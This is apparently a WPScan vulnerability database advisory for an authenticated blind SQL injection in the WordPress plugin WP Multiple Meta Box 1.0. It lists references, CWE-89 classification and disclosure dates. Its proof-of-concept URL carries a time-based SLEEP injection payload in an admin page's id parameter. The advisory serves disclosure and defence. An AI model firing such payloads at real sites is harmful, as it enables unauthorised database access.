WP Multiple Meta Box 1.0 - Authenticated Blind SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Proof of Concept
http://www.example.com/wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))Etmx)

Affects

Plugin multi-meta-box

References

URL http://www.vulnerability-lab.com/get_content.php?id=1818
URL http://seclists.org/fulldisclosure/2016/Apr/35

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter firefart
Submitter Website https://firefart.at/
Submitter Twitter _FireFart_
Views 310
Verified Yes
WPVDB ID 8437

Timeline

Publicly Published 2016-04-08 (8 months ago)
Added 2016-04-12 (8 months ago)
Last Updated 2016-04-12 (8 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.